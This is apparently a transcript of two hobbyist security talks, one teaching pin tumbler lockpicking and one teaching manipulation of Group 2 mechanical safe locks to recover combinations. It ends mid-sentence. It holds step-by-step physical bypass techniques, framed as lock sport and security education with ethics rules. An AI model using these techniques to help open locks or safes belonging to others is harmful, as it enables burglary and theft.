Welcome to the Lockpick Village. We are the open organization of lock pickers and international nonprofit organization dedicated to teaching hobbyist lock picking, sometimes called lock sport. This is the tool introduction to lock picking talk, where we will teach you real lock picking over the course of the next 20 to 25 minutes. To begin with though, we have some rules. Because we are the good guys, the white hat hackers, ethical lock sporters, we have two rules that we're very serious about. First, don't pick locks that you don't own, which includes the locks in your apartment or the other institutions that you're at. Also, don't pick locks upon which you rely. We want lock picking to improve your safety and improve your ability to control your surroundings, not damage the locks or damage your personal safety. Follow those two rules, help us improve the impression of lock pickers, and help yourself stay out of trouble. The type of lock picking we're talking about today is pin tumbler lock picking, and it has two tools involved. Not one, not three or more. It's two hands with two different tools, doing two different tasks inside the lock. In Hollywood, you'll see them stick any old thing, a piece of chewing gum, a pen inside the lock, and what do you know? It just falls open. In the real world though, picking this type of lock takes two different tools with two different tasks. I show you this slide here so that you can see it, at least once right before we talk about how it's actually done. As for the type of lock, that pin tumbler lock, well that's the famous lock profile that you've seen just about every day if you're in North America and many places outside North America. Whether you see that shape in a deadbolt or a padlock, or any time that you see that familiar curvy shape, that's the pin tumbler lock, and since about 1865, it has been what we mean when we say lock in North America. You're used to seeing it from the outside, which are probably less used to seeing, is the inside. Let's go past that front face and look behind it. Here's your X-ray view and some vocabulary terms. There's a lot of terms here, but one I want you to focus on is that one right in middle, that blue pin, which we call the driver pin. Obviously they're not red and blue in real life and we can't really refer to them as one pin, two pin, red pin, blue pin, nor can we refer to them as top and bottom pin, because in Europe, when they have these types of locks, they can often be inverted, and since they've been doing this longer than we have, they win, we don't call them top and bottom, we give them functional names. And the driver pin, the driver pin's job has to push down on that key pin. The key pin holds the driver pin up and the spring makes sure that gravity doesn't affect what happens with those pins. If you want to think about it, the driver pin is the lock, because it's the piece that's half in and half out of that plug, that yellow plug that turns. If the driver pin sits right there, then the lock stays locked in the spring and the key pin are just there to make sure that, unless and until the proper key is entered, that driver pin is in the way. We talk about the driver pin being in the way. What we mean is, it's at this dotted line called the shear line. The shear line isn't a part of a lock, it's a place or it's really an absence of thing, which is the separation between, again, the plug that turns and the housing that doesn't. As long as there's something at that shear line, usually the driver pin, the lock is locked, won't turn and won't open. Here's what it looks like when you try to turn the lock with the driver pin still in place. It wobbles a little bit, but it doesn't open. Think of that driver pin as saying, no, no, still no, try again, I'm locked. The way to change that is with a key. All the key's job is to displace, fill up that space so that the key pin rises up, which in turn pushes the driver pin up. And as soon as the driver pin is past that shear line and there is nothing at the shear line, i.e. the key pin is all the way in and the driver pin is all the way out, there's nothing blocking the plug, the plug can turn and the lock can open. If you take multiple driver pins, multiple key pins and multiple springs, and you all put those in a lock body, you have a real, honest to goodness, bought it at the hardware store lock. This is the lock at rest, a few things you'll notice about it. First, the driver pins are all in line at the shear line and they're all identical. Also, the springs are all identical up here, even though they look like they're different sizes, they're just doing what springs do in filling up space. The key pins, the key pins are where the difference comes in, key pins, some are short, some are tall. That's where the variation lock to lock comes from. And by definition, the key for that lock is the reciprocal of each of those key pins. Notice that the pin don't fall all the way down to the bottom of the lock because there's a hole, the hole that each pin is drilled into is just the right size to make sure that even though this area down here looks like it's just empty space, it's actually a little notch so the pins don't fall all the way down to the bottom and that there's room for the key. Now, if you have the right key for the lock, it slides in, you'll watch the driver pins go up and down, the key pins go up and down, and when it's finished, there's a nice clear shear line. You pull the key back out, everything returns to its resting state, and the lock is locked again. One more time, the springs give way and then they push everything back down to its new resting state with a clear shear line. If you have a key that is almost right, you have a lock that is almost locked. In this case, this key is right in the first position, third, fourth, and fifth position, but the second position, it doesn't lift the key pin quite high enough, which means the driver pin isn't lifted quite high enough and there is still one driver pin at the shear line. This lock is almost open, but almost is not good enough, it's still locked. You can have the alternate problem, where now we have a key that is a little too high in that second position, which means it's pushed that key pin up above the shear line. Key pins are just as happy as driver pins to block the shear line and prevent that lock from opening. But of course, where we're going, we don't need keys. So if you came here just to learn about keys, then you can go, you know everything there is to know about pin tumbler keys. If you wanna learn about lockpicking, then kick your brain into overdrive, because this is the complicated part here. In a perfect world, lockpicking would not be possible. Now that wouldn't be a perfect world for all of us that love teaching lockpicking and love doing lockpicking, but when I say a perfect world, I mean, mathematically perfect, where things roll off the production line exactly the way they were designed. Here is a schematic view of a lock. We've taken that plug, you've taken all the springs, key pins, and driver pins out of it, and we're just looking at the holes that they go into. You'll notice that those holes are perfectly in line, which means when you try to give that plug a turn after you filled it with springs, driver pins, and key pins, each one of those driver pins that is right on the shear line, every single one of them says together and in unison, no, stop, go no further, the right key isn't in here, this lock will remain locked and they agree on that. And that would be great if such a lock existed because it would be unpickable reason being the only way to open the lock would be to lift each and every one to the right height at the right time. And if you can do that, then you have what's called a key. In the real world, however, no lock is perfect. So what you see here is the downsides of mass production. Cheap locks, not bad locks, just inexpensive locks built with different priorities in mind, cost effectiveness being one of them. So here you see the chipping, the marring, the misalignments, the rusting that comes from a real world piece of equipment. As a result, if you put key pins into it, then you'll see that they don't all align. In fact, up here at the top, the holes have drifted fairly far to the left. And down here at the bottom, the holes have begun to drift to the right. Of these one, two, three, four, five, six pins, only about one of them is in the center where it's intended to be. All the rest of them wobble a little bit. So here's what it looks like in the real world. We've taken this plug again and we've redrawn it to be schematic of what you'd see in a real lock in the real world. It was manufactured off a real manufacturing line. And you'll see that all the holes are still there, but now they wander a little bit. We put this dotted line here to make it a little bit more obvious. And you can see that the one, two, three, fourth pin here is the most out of line. If they are not perfectly in line, then by definition, one of them has to be the most out of line. In this case, in this particular example of a lock, it's the fourth pin that is the furthest to the right, which means if we were to give that plug a turn, well, it wouldn't open because it's not that bad. But what it would do is it would stop on the one and only one driver pin that is actually in the way, which is the one furthest to the right. So you can think of it as five pins, but now instead of agreeing whether the lock should stay closed, four of them are silent. They don't even notice the plug is being turned. One and only one of them is saying, stop, go no further. In other words, you've paid for five pins worth of security, and you're only getting this one pin worth of security right now because of manufacturing tolerances in the lock. So it stands to reason that if this is the one and only one pin that is blocking your progress, if you could reach inside the lock with some sort of lock pick and lift up on that key pin, it would lift up on the driver pin. And if you managed to get that driver pin above the shear line, then nothing would be stopping the lock from turning. And it would turn. How far would it turn? Not a lot, just until it stopped at the next pin that was in the way. On this diagram, it might be the first one. You have to figure that out for yourself. Lock by lock, pin by pin. Remember, these are not intentional. These are manufacturing defects or manufacturing tolerances. But that's the nature of hacking, given an inch or given a fraction of a millimeter, we will take a mile. This allows us to pick each pin individually using only one lock pick. So let's go look back at that attempt without a key. If you turn the plug, the plug turns a little bit and then stops on that driver pin. We call that the binding pin. If you can find the binding pin, then your job is solve the binding pin. Lift up on it just enough such that the key pin pushes the driver pin above that shear line and watch what happens something magical. The plug turns under the driver pin and the driver pin can't go home again. One more time, once the driver pin goes above the shear line, the door closes behind it and it traps it up there. In other words, it's mechanical autosave. It's like a ratchet mechanism. Not designed that way. It's an effect of the manufacturing tolerances and we're going to exploit the heck out of it to allow us to set multiple pins in a row until there are no more to set and the lock falls open. Here's what it looks like in practice. We're first going to tension the lock. If there's no tension, then you're not picking the lock. You're just lifting up pins and they'll fall right back down. You need to tension the lock to create that bind in the first place. Once you've created the bind, your next job is to find the bind. Go through the pins sequentially, lift up on each one, so you find one that has a little bit of a grind, crunch, creak, something, anything other than the squishiness that says, it's not the binding pin, it's just the spring. This may take a little bit of practice, keeping track of where you are on the lock and learning how to feel the subtle differences between the pins. That's the skill of lock picking. But as you get better at it, you'll be able to find each binding pin, pushed up just the right amount, get the click, get the feedback, get the little bit of turn of the lock that tells you it's set, and then you go on to the next one. Do that for as many pins as there are in the lock, and the lock will just fall open. This is not like a big safe lock where you've got to chump it open at the end, because you've been turning since the very beginning and taking away each and every obstacle to the turning. So if you just put the tension in, start turning, that same constant steady pressure will serve you all the way through the end. And every time you set a pin, the lock will turn just a little bit more until when you've removed all the pins in the way, it will just fall open. Now let's take a look at one of the most common problems in lock picking that will stop you cold, especially if you don't know to be on the lookout for it. We call it overlifting, and that's when you replace one problem with another by putting the key pin up above the shear line, where the driver pin normally is. You see this person picking along had a short one in the fourth position and another short one in the third position, which means when it comes time to pick the last one with a little bit taller key pin, they lift it too high, and it gets bound above the shear line. The only way to get out of this position is to release your tension down here, shake the edge of sketch, and lose all your progress. So just like getting a haircut or salting the soup, you can always go back and do more. It's very hard to go back and do less. So light hands, small movements, remember how small these pieces are and avoid overlifting. You'll save yourself a lot of trouble. And of course, if you do get stuck, that's OK. Shake it out, shake your hands up, shake the lock out, start over, you'll do better next time. We've talked a lot about what this hand is doing using the lock pick. But let's talk about the unsung hero, the turning tool. A lot of very intelligent pickers will tell you very seriously that in all practicality, the turning tool is what picks the lock, because the turning tool is responsible for putting that all-important, constant, steady pressure on the lock. As far as how to apply that pressure, well, first, we like using that big finger, the precision digit, and put it far out on the turning tool so that you can use leverage and amplify any feedback you get. Next question, how much turning pressure? And I will tell you honestly, there is good reasons to do light pressure, and there's good reasons to do heavy pressure. And someone who tells you one or the other isn't wrong, they're weighing different things. We at the lock pick village tend to tell novice lock pickers, start off with light pressure. That has a lot more to do with not damaging the locks or the equipment than it does with being the most effective way to pick locks. A lot of very good lock pickers tend to use quite heavy tension, but very carefully modulated heavy tension. They use the right amount of tension to get the feedback from the lock. So experiment with the tension levels, but most importantly, don't put on more than you can confidently, comfortably, and safely use. As for the type of picks, you'll probably have a lot of picks in your kit. We call this one the hook. We call this one the half diamond, because apparently triangle is too hard to say. This is sometimes called a rake, a snake rake. There's lots of varieties of cool little wiggly ones. When you're just starting off, we recommend starting with these two, either the half diamond or the hook, because they tend to promote the best practice and give you the most accuracy in picking one pin at a time. Now, as you're starting off, there's a tendency to figure out how you want to lift in the lock. You could put it against the bottom. You could put it against your finger. You could float it in midair. Whatever works for you, mindful of the task that you're trying to do, which is feel very small things in a lock and get it to turn. So don't add any more friction to the lock than you need to. And don't rub up against the sides or other material in the lock more than you need to. But mostly, it's a matter of personal choice. Accept that. If you're doing something like this rocking lifting, I want you to make sure that lifting doesn't turn into crow barring. These are precision tools. And if you're really digging, especially if you're using really heavy tension and you start getting really firm binds, there's a tendency to start crow barring and the pick starts to bend, which means it's no good for anyone. If these are your tools, then that's too bad, because you're out of tool. If there are tools, it's almost worse, because then not only can we use it, but no one else can use it either. And it makes it harder to put on lockpick villages like we love to do. So as you're picking, be gentle. Remember these are precision tools. I put up a picture of the bunny here, not because I think you're children, but because I know I've thrown a lot of complex information at you. And if I show you a picture of a crying bunny, you'll remember, be gentle. Ease up. Use the tools with precision. Now, if you're just starting lockpicking, there's a great activity that everyone would benefit from. And that's this. Pull the turning tool out of lock. Just for this one time, don't try to pick the lock. What I want you to do is feel the tension. Think of this as a tension taste test, or as a springiness taste test. Reach into the lock with the pick of your choice. And on that one pin, just lift up on that pin. This is especially great if you have a lock. There's taken all the other pins out, and there's just one to focus on. But you can do it with other locks, too, with a little bit of cleverness. Just lift up on that pin and feel what a springy pin feels like without any tension. Then, and only then, add the turning tool so that you have a little bit of tension. And now, if there's only one pin in the lock, you've created a binding pin. Now go in and try that one on for size. Feel that binding, grinding, crunching, scraping. Characterize it however you want. But being able to tell the difference between that binding pin and the unbinding pin without tension is the essence of lock picking. And zeroing in on that feeling will make you a much better lock pick. Of course, the most important part of lock picking is practicing. And a tool we've gone to a lot of effort to create practice locks specifically designed for learning lock picking. If you're at one of our lock pick villages, we have multiple locks that have some of the pins pulled out of them. So you can go from a one pin lock all the way up to a six pin lock and learn as you go. But you don't need tool locks to practice. You can get locks at your hardware store. You might find padlocks like this. They work fine. They're cheap locks. But they'll teach you enough about lock picking. You can also find just regular door deadbolt locks. It doesn't matter what type of locks that you get as long as you sit down with them, you practice with them, and you have enough of them that you have the variety. So you're not learning how to pick a particular lock. You're learning how to pick locks in general. Because you're at home, I wanted to run you through some frequently asked questions that we often hear, see if we can get you set up on the right path. Preston, how do you hold the lock? What we like to do is turn the lock so the top part is deep in the web of your hand, and then you can close these two knuckles here over the lock. Holds it fairly gently but securely. And then if you stick out that index finger, the turning tool will just rest right against that index finger, giving you the right amount of pressure. How do I hold the pick? Well, think of it like a scalpel. This is a surgical tool. So hold it like a scalpel. That pencil grip works great. This one doesn't work so good because you've got a little bit too much grip, and people tend to start digging too hard. And then, of course, holding it like a shiv is right out. That's dangerous and weird. Avoid that. And if you happen to have locks that are out of their housing, so as you can see, the back of the lock, which people don't typically see, we want to make sure that you know that the pick goes in this part, this shiny silver front. If you can see the back that looks like that, that's the wrong end of the lock. Go in the front. You'll have a lot more lock. Now, lock picking, not supposed to be easy. This is new. This is a skill-based exercise. The evolution has done nothing to prepare you to. So I want to make sure that as you're doing this, be nice to yourself. Relax if you want to have a beer, talk to somebody. That's all part of the fun. That's what we do when we're doing tool meetups. We sit around. We chat with each other. We relax. We have fun with it. And if you don't know what that animal is, now you have seen a baby wombat in your day is better. And then, traditionally, in lock sport, no matter what the lock is, whether it's a practice lock or it's a project lock that you've been working on for weeks, when you get it open, say open. Own it, celebrate it. All locks you open are worth celebrating. And we want you to have fun with it. Lastly, if this sounds like fun to you, we are a membership organization. We have members all over the United States, Canada, UK, Australia, and many other countries. We would love you to join be a part of the organization from your home or in person as soon as we can. So go check out members.tool.us. And of course, if you can't wait to get lock picking, you want to get your hands on lock picking gear as soon as you can, then tool.us slash equipment has exactly the gear that we like to train people on. And we'd love you to get started on it too. So happy lock picking. Practice, be gentle, celebrate your wins, and we'll see you at the next lock pick village.
Want to tinker with locks and tools the likes of which you've only seen in movies featuring secret agents, daring heists, or covert entry teams? Then come on by the Lockpick Village, run by The Open Organisation Of Lockpickers, where you will have the opportunity to learn the hands-on how the fundamental hardware of physical security operates and how it can be compromised. The Lockpick Village is a physical security demonstration and participation area. Visitors can learn about the vulnerabilities of various locking devices, techniques used to exploit these vulnerabilities. Experts will be on hand to demonstrate and discuss pick tools, and other devices that are generally available. By exploring the faults and flaws in many popular lock designs, you can not only learn about the fun hobby of sportpicking, but also gain a much stronger knowledge about the best methods and practices for protecting your own property.
10.5446/50742 (DOI)
Welcome to Save Cracking for Everyone. A little bit about myself, who am I? My name is Jared Diger. I'm a locksport enthusiast, gamer, rock climber, game developer, and I've been picking locks and cracking saves for about a decade now. So this talk is going to cover how Group 2 safe locks work, and mechanical combination safe locks are divided into two groups. There's Group 2s, which is your basic safe lock. No anti-manipulation features in them. Also the most common type. And then there's Group 1s, which are more complicated and include various different measures to keep people from figuring out the combination. Now whether you buy a $500 safe or a $5,000 safe, if it comes with a mechanical safe lock, it will most likely be a Group 2 safe lock. Very rarely are there Group 1 safe locks that come by default on a safe. Basically you have to pay hundreds of dollars extra for the lock, even more to get it installed, and it is not very common at all. So I'll be covering these Group 2 safe locks in this talk. I'll cover the flaws in this design and how to exploit them, along with specific techniques that is used to crack the combination. And at the end, I'll cover some slight differences between various Group 2 safe locks, since not all manufacturers create them the same way. First thing is knowing the parts of the lock. So this is the back of the lock with the back cover removed, and you can see that there is a silver lever here. Now the end of this lever has a protrusion, and this protrusion is called the nose. This nose is resting on a brass wheel. The brass wheel is called a drive cam. And this drive cam, you can see, has a cutout in it. This empty space in the drive cam is called the contact area. You can see where the cutout starts on either end, and those are the contact points. So the cutout is the contact area, and each end of the cutout where it starts is the contact points. And this drive cam is controlled directly by the dial. So there's a metal rod you can see in the middle, and that connects it directly to the dial. It's locked in place with this key. So whenever you turn the dial, the drive cam moves at the same time with the dial. Behind the drive cam, you can see a larger silver wheel. There's three of these wheels generally in each lock. Sometimes there could be four, but most often times it's three. Now this wheel that we see here is called wheel three. It's the third wheel. It's closest to the drive cam, and when you're in front of the lock, it would be furthest away from you. And the other two wheels are behind it. Now each of these wheels are exactly the same. There is a cutout in each of these wheels called a gate. Now these gates are part of when you dial the combination. The gates all line up, and there is a metal bar behind this lever, and it lines up all of these gates under the metal bar when you dial the correct combination. So that when you turn the dial and the drive cam, so the contact area is under the nose, then can fall down and fit nice and easily. So here you would just continue turning the dial, and that would pull in this lever, and that retracts a bolt. The lever is attached to the bolt, and that pulls it in so that you can turn the handle and open the safe. The handle of a safe just pulls in the outermost bolts around the edge of the door so that you can open it, but the lock itself only locks the handle. So that's basically how safes operate. The mechanism locks the handle, and the handle is what pulls in the bolts from the outer edge of the door. Now to demonstrate that, I have a lock here, and if we look at the back, you can see the drive cam. Whenever I spin the dial, the drive cam moves with the dial. So if I were to dial in the combination, that would involve putting the gate of the first wheel under the fence, and then I would put the gate of the second wheel under the fence as well. I messed that up, but I will just fix it. And then I put the gate of the third wheel under the fence. I simply turn the drive cam so everything can fall in, and then that will retract this bolt when I continue turning. Now the way that it works is each of these wheels has a protrusion on one side, and that fits into a groove of the next wheel. Now this protrusion will ride in this groove as the wheel spins until it hits this metal piece of the next wheel, at which point this next wheel will start to spin along with the previous wheel. And this wheel also has a protrusion which rides in a groove of the wheel next to it, and then after a whole rotation, it will hit this metal bit, and then the next wheel will start to spin along with the rest of the wheels, essentially picking up each wheel after each rotation. So the drive cam has that sort of protrusion as well. So right now everything is spinning together, but if I were to spin the other way, you can see it is only the drive cam spinning. And I made one full rotation, and then this third wheel, the wheel closest to the drive cam, starts spinning with it. So the third wheel gets picked up first, and then after another full rotation, you can see that the second wheel starts to get picked up as well, and it is spinning along with it. After another rotation, then this first wheel gets picked up as well. And the wheels are named this way because the first wheel corresponds to the first number in the combination. Since it is the last, you get picked up, then it is set first. So then you can freely mess it out with the other two wheels without upsetting the position of that first one. So the third wheel gets picked up first, corresponding to the third number in the combination, then the second wheel, and then the first wheel. Now the standard opening procedure for a lock is to spin four times with left rotation to the first number, which means you pass the first number three times, and you stop on the fourth. Then you reverse directions because if you were to keep going, it would mess up the position of the first wheel. So you reverse directions, spin three times with the right rotation, so now we are turning counterclockwise. So now we are turning clockwise to the second number, and then you do that three times. So you pass the second number twice, stop on the third time, and then twice with counterclockwise rotation, so we are reversing rotation again to the final number. We pass it once, and then we stop on the second time. Then we turn right until the bolt is retracted. Now the reason for this is because you have to spin three times to ensure all the wheels are picked up. You don't know the state of this wheel pack when you approach the lock. So it could be someone spun it to the right all the way before you approached it. So you want to make sure you spin one full rotation. We'll pick up that third wheel, two full rotations, picks up the second wheel, and then three full rotations ensures that that first wheel gets picked up. So we just passed the first number in the combination three times. So now we have to go to it and stop on the fourth time. We reverse directions because otherwise it would mess up the position of that first wheel. So we do one full rotation, pick up the third wheel, two full rotations. Now we pick up the second wheel, and so we pass the second number twice, and we stop on the third time. I overshot it again, reverse directions, one full rotation picks up the third wheel, and then we stop on the second time. And then we can turn right until everything drops in and the bolt retracts. Here's a really bad drawing. I missed the label with this. This is wheel two in the middle. So the dial will turn the drive cam until this protrusion picks up wheel three. And then after rotating for some time, wheel three will pick up wheel two, and then wheel two after rotating will pick up wheel one. And so then they'll all start spinning together. There's a lot of vulnerabilities in this design. So you can see here when none of the numbers are dialed in correctly, and then we turn the drive cam, we turn the dial so that the contact area is under the nose that allows the fence to drop down onto the wheel pack, essentially testing it for the crack combination. But the thing is these wheels, they're not perfectly circular, and they're not the same size as each other. Some will be bigger, some will be smaller, and some will have bumps and dips, and that's because of manufacturing tolerances. It's basically impossible to get rid of these imperfections. What this means is, since one of these wheels is bigger, the fence is not going to be resting on all of the wheels at the same time. You can see here between wheel three and wheel three and the fence, there's actually a bit of space. It's not touching. Wheel two here you can see is larger than wheel three and wheel one. This fence is only touching wheel two. Now we can also see that this contact area where the contact points are on either end, it is sloped to go down. That means there is less wiggle room, so to speak, between the sides of the contact area the further down you go. Let's assume that wheel two, let's pretend that the wheel two combination is dialed, that the gate for wheel two is now under this fence. What would happen? Well, this fence would not rest on wheel two anymore. It would drop down ever so slightly and rest on wheel three. That means this nose would be lower in the contact area and there's less wiggle room between the contact points. The really cool thing about this is you can feel this on the dial. So if I were to reset this, you can see that the nose drops into the contact area when it's over the contact area and that allows the fence to rest on to the wheel pack. So if the largest wheel has the gate under the fence, this nose is lower. This wiggle room, you can feel this bit of resistance, you can feel each contact point from the dial. That wiggle room would be less. So the contact points, about 96 for the left one, we name it from viewing the dial, or from the dial. So the more sloped side here on the left in this view is the right contact point because from the front of the safe, that's the right. So this left contact point is about 96 and the right contact point is about three. But if perhaps two of the wheels were dialed with the gate under the fence, we might feel this at 98 and two, thus the closer contact points less wiggle room. So that is a major vulnerability and the main thing we use in order to determine the combination. So we can know through this when one of the gates, when the gate of the largest wheel is under the fence simply because there will be less wiggle room between the contact points. So the first step is finding a number in the combination with this information that we now have. So what we do is we have to take a series of test combinations, every two or two and a half numbers. The tolerances of these locks sometimes allow you to go every two and a half, but generally it is safer just to go every two numbers. And there are two contact points that are left and the right, but as shown earlier the right contact point is more sloped. So there will be a greater change in the amount of wiggle room from the right contact point. The left will move in a little bit, but not as much as the right. So we really only need to know what the right contact point is at any given time. And you can graph this as well. So I get my graph paper right here. You can see this is a basic layout of a graph. So along the top we have zero to a hundred. And then here I put the closest whole number to the left contact point, one above and one below. Same thing with the right contact point, one above and one below. And as I mentioned, you don't really need the left contact point, but it is good supporting evidence if the right contact point is not really giving clear readings, which we will cover later. So you can graph both of the contact points like this. So first thing is you want to turn the dial left three times to pick up all of the wheels and then stop on the first reading so we can say we're going to try zero. Now the reason we spin left and we pick up all the wheels with left rotation is because the combination is dialed with left, right and then left rotation. So left to the first number, right to the second and then left to the third. So if we find a number, it's kind of random. We don't really know which wheel is going to be at first. We just know one of the wheels is larger than the rest and we want to figure out when that wheel has a gate under the fence. So it's just statistics that it's going to be more likely the first and the third rather than the second. Also because of the way the locks are designed, wheel three would generally be larger or will be the wheel that makes contact with the fence first. So that's more evidence to start with more reason to start with left rotation first. So what we do is we spin the dial, pick up all the wheels with left rotation and then we stop our first test combination. So in this case that would be zero, zero, zero. We stop at zero. And then what we do is we want to reverse directions because if we were to keep going that would mess up the position of the wheels. So we reverse directions until we get within the contact area. So remember our contact points are 96 and 3 so we want to spin left until we're within that. So we don't want to pass zero because remember after one full rotation we pick up the third wheel. So we just want to go between zero and three and then you just spin, I accidentally passed it but we'll ignore that for now. You want to gently spin the dial left until you hit the contact point and you don't want to ride up on it. You don't want the nose to ride up onto the drive cam. You just want to go lightly and stop when you feel that bit of resistance and then you can record that. So on the graph at zero down to three let's say we feel at two and seven eighths. Then you can mark that from here two and seven eighths for zero. So that can be about here. And that is also really important is you want to be able to differentiate between one eighth of an increment. And that's really hard to show on camera here for this because it's not really precise and also the resolution of the camera. But you want to be able to look at the dial and know whether it is showing like a two and seven eighths or a three or a 35 and one eighths or a 35 and two eighths. And you want to be able to accurately record that because what we're looking for is a change of a one quarter increment. So we want to make sure that our measurements are taken with a precision of one eighth of an increment just to be safe. So oops. Okay. So we're going to pretend that we did this for the entire, I guess all the numbers of the safe. So if I were just to fill it in just with some random points. And I'm just putting a generic, generic reading here. And as stated earlier, you can record the left contact point here as well. It's just that it's not going to be as much of a variation. So here, essentially what we're doing is we are taking the overall shape of all the wheels of the wheel pack and we're just laying it out in a line. So if this were to be cut into a strip of paper and put into a circle, this is what the wheel pack would look like on a very fine scale because remember, they're not perfectly circular. So on a very fine scale, there's a lot of bumps and ridges and whatnot. Now if you remember, I'll show the picture again of the close up when the gate of the largest wheel is under the fence that causes a drop. There's less wiggle room. That right contact point moves in so it gets lower. The left contact point would get higher. So that's essentially what we're looking for on the graph. We're looking for where the right contact point drops down for maybe a number or two and then goes back up because the gate would be under the fence and then you would go past it and then would not be under the fence anymore. So it would drop down and go up. So essentially, you want to look for the shape of a gate in this reading. Now you can see there's a drop here, but it goes on for a little while before going up. So that's probably not it. That'd be really wide for a gate. And but here you can see it drops down for a quarter of an increment for two readings and then drops back up. The thing about these safes is the safe locks is you don't have to be precise in dialing. That is also why we go every two number. You go from zero to and then four, every line here on this graph. So if the combination is 16, 28, 40, you can dial 17 or maybe 18, 28, 40 and it would still open. So you want to look for the shape of the gate in the graph. That will tell you one of the middle of that of that gate will tell you one of the numbers in the combination. Now we're going to assume that the number we found is 40. So at this point, we know that the largest wheel in the lock is red has a combination of 40 associated with it. Okay, but we don't know which wheel yet. We just know that there's one of the wheels in the lock is larger than the others. And the point at which the contact area goes closer together and then further apart centers around 40. So we do something called the high load test. We put 10 numbers lower on the first wheel and then we put the other two wheels on the correct number. So we found we're pretending we found 40 as the correct number. So we will throw the first wheel off by 10, 10 numbers lower. Now we found 40 with left rotation. So whenever we put one of the wheels on 40, it always has to be with the left rotation. So the first number, we will use right rotation to 30. We pick up the wheels. All the wheels, so four rotations, 230 with the right rotation. And then we spin left three times to 40. So that would put the second and third wheel on 40. And we will measure the contact area here. And here it is important to take both left and right contact points. And then what you want to do is figure out the space between them. So if it is at 96 and three, that is a seven, seven number difference. So we would write down seven and we would record that down. And then we do the same with the second wheel. We put the first number on the correct number. So left to 40, left four times to 40. And then go right three times to 30, putting the second wheel, throwing it off by 10 lower to the wrong number. And then left to 40 on the third wheel. Record the space between the contact points, how many numbers there are, and then write that down. Now we do that again for the third wheel. Left rotation four times to 40. And right twice to 30. That ensures that only one number is off. The other two wheels are on the correct number. And then you can repeat with 50 as well instead of 30. So that would be the high test. Now the test combination with the widest contact area is the one that 40 belongs to. So for instance, we did three test combinations here for this low test. If for this last sequence that we dialed, 40, 40, 30. If that has the contact area with the most space between it. Now normally before we were looking for a closer contact points. But here we're looking for a furthest apart. And the reason for that is because we have the correct number on the wheel, on two of the wheels, and the wrong one on one of the wheels. So if the wrong one is on, let's say here, let's say the third wheel has 40. So if we're intentionally putting on the wrong number, it's going to be a wider contact point. But seeing these two, it's got the correct number. So it'll be closer. So this allows us to figure out which wheel that 40 belongs to. Simply by putting the correct number on each wheel twice and then having it off on one of these. So if wheel three has 30 and it's wider here than the other two tests, then we can successfully conclude that 40 belongs to the third wheel, the third number in the combination. And then you can repeat with 50 just to really be sure that your readings are correct. So we're going to assume that 40 here is the third number in the combination. And then check your rotation any time you dial to a correct number. You want to make sure you always use the correct rotation. Now we found one of the numbers in a combination and we know it's the third wheel. So in order to find the other numbers, we essentially just repeat the same step with this new information added in. So we run the other two wheels through every two increments, but we have the third wheel on 40 whenever we read the contact point. So the way that this is done is we know that the third wheel, right, the first wheel that gets picked up, that means we have to set it last. That is with left rotation to 40. So what we want to do is we want to pick up all the wheels with right rotation now. And then we'll say let's start at zero. And then we spin left for one rotation. So that picks up just the third wheel. And we stop on 40. So now we have left rotation on 40. Now going to zero isn't going to affect any of the wheels now, remember, because we have to pick up the third wheel in order to affect the rest. So we can safely move around here without fear of disturbing the other wheels. So we can read the contact point again, going from inside the contact area. We can read the right contact point and then graph it. So we just do this graph. And at the top, we can maybe just write wheel three left 40, just so we know that we're doing this graph with wheel three on 40 with left rotation. And then what you can do now is you turn right until you reach 40. Now that picks up the third wheel. Go to zero where the other two wheels are resting together. And that picks up wheels two and wheels one at the same time. Because remember, we had everything pick up together. We only messed up wheel three in order to put it on 40 by itself. You can turn two numbers over. It's been left again, one full rotation to 40. Go to the contact area and report it down again. And we just go do that the whole way around. So here we can repeat the same high, low exercise. So we're going to pretend we found a drop in the graph and then arise back up at center around 80. So we found 80 with right rotation now. So what we're going to do here is a low test. So we're going to start with here wheel two and we're going to throw it off by 10 onto 70. So wheel one, we put it on the correct number, 80 with right rotation. So that means we spin right, picking up all the wheels, stopping on 80. Then we spin left, picking up wheels three and two. So we go three times to 70. And then here's where it gets interesting. We need to go to 40 now with left rotation because we found 40 as the correct number with left rotation for wheel three. But if we were to continue past 70 left into 40, it would mess up wheel two. So there's actually a clever way to fix this. So we spin right picking up all the wheels and then we stop on 80, which is what we found to be one of the other numbers. We can spin left one rotation picking up wheel three, another rotation picking up wheel two and we want to put wheel two with left rotation on 70. So that is 10 lower. And then we want to go to 40 now for the third wheel. But if we were to keep going, it would mess up wheel two on 70. So what we do is we can reverse directions here, pick up wheel three from 70, go to 40. But remember, this is not the correct rotation. We're turning right. We need to be turning left. So we just go past it, let's say to 30, and then we can go left picking up at 30, setting wheel three on 40, at which point we take our contact point readings for our high load test. And then again, you would write down the number of increments, you know, the space between each of the contact points, and then do that with the first wheel. We throw the first wheel off by 10. So we go left to 70 for the first wheel, picking up all the wheels, and then right three times to 80 in the left to 40. So we write down the numbers. Again we look at what is the widest contact area, and that will give us where our second number lies, like which wheel it belongs to. And usually locks will read this way. It will read third wheel first, and then the second wheel, and then the first. But sometimes it can go other ways. But following this method, it doesn't really matter which wheel reads first. As long as you know how to dial in these numbers, then you can still do it just fine, no matter which wheel reads first. And then here we have two of the numbers in combination. So let's pretend that 80 belongs to wheel two. So it's a question mark for wheel one. We know 80 is right rotation to wheel two, and then 40 is left rotation to wheel three. And the last wheel, you can graph it, but generally you just brute force it. You would just try to 80 40, or 080 40, 280 40, 480 40 until it opens. When you're starting out, it is actually a good idea to graph that last wheel as well. Just in case you messed up on the first two, and you did not find the correct number, it is useful to have that extra information. Now there's different group two locks. The one I am using here that I have shown is what is called a Sergeant Ingrid Leaf, an XNG 6730. There's two major variations, a 6730 and 6741. They operate the same way, work the same. You cannot tell by looking at it which one it is. It's just that the 6730 has slightly tighter manufacturing tolerances, which is why I recommend going every two increments on your graph, rather than every two and a half. But if you know you have a 6741, if it is labeled a 6741, then you can get away with going every two and a half increments, because those tolerances in the manufacturing are not as tight, and you will be able to find the correct number by going every two and a half increments. Now another popular brand is Lagarde, the Lagarde 3330. They have slightly oval wheels. And the reason for that is because of the way that inside the wheels work, there's a certain mechanism that allows you to change the combination, and that puts pressure on the wheels in certain ways. And that just makes it slightly more oval shaped, which means the wheels can essentially mask the gates on other wheels. Maybe none of the wheels are bigger than the others, but they can be aligned that when they're all picked up and they're all moving together, the oval shape covers essentially, becomes the biggest part of the wheel pack in that location, and that gate is never going to allow the fence to drop lower, because one of the other wheels will be larger in that area. And so it can be rather difficult to work with a Lagarde 3330, so I do not recommend starting out with that. There is also a die bowl, which is a lock with a drive cam where instead of having one side that's more slanted, it will be a U 